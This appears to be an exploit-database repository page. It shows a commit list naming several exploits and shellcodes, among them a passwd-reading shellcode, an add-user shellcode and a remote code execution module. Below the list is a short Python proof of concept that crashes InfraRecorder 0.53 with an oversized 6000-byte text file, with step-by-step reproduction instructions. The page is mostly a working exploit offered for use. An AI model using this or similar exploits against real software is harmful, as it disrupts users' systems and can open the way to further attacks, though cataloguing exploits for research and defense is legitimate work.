c1b7aa12fc
10 changes to exploits/shellcodes CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC) InfraRecorder 0.53 - '.txt' Denial of Service (PoC) Faleemi Plus 1.0.2 - Denial of Service (PoC) Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH) Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit) Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes) Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
26 lines
No EOL
810 B
Python
Executable file
26 lines
No EOL
810 B
Python
Executable file
# Exploit Title: InfraRecorder 0.53 - '.txt' Denial of Service (PoC)
|
|
# Date: 2018-09-14
|
|
# Exploit Author: Gionathan "John" Reale
|
|
# Version: version 0.53
|
|
# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
|
|
# Tested on: Windows 7 32bit
|
|
|
|
# Steps to Reproduce:
|
|
# Run the python exploit script, it will create a new file with the name "exploit.txt".
|
|
# Start the program and click "Edit" > "Import... "
|
|
# Find the file "exploit.txt" and click "Open"
|
|
# You will see a crash!
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer = "A" * 6000
|
|
|
|
payload = buffer
|
|
try:
|
|
f=open("exploit.txt","w")
|
|
print "[+] Creating %s bytes evil payload.." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |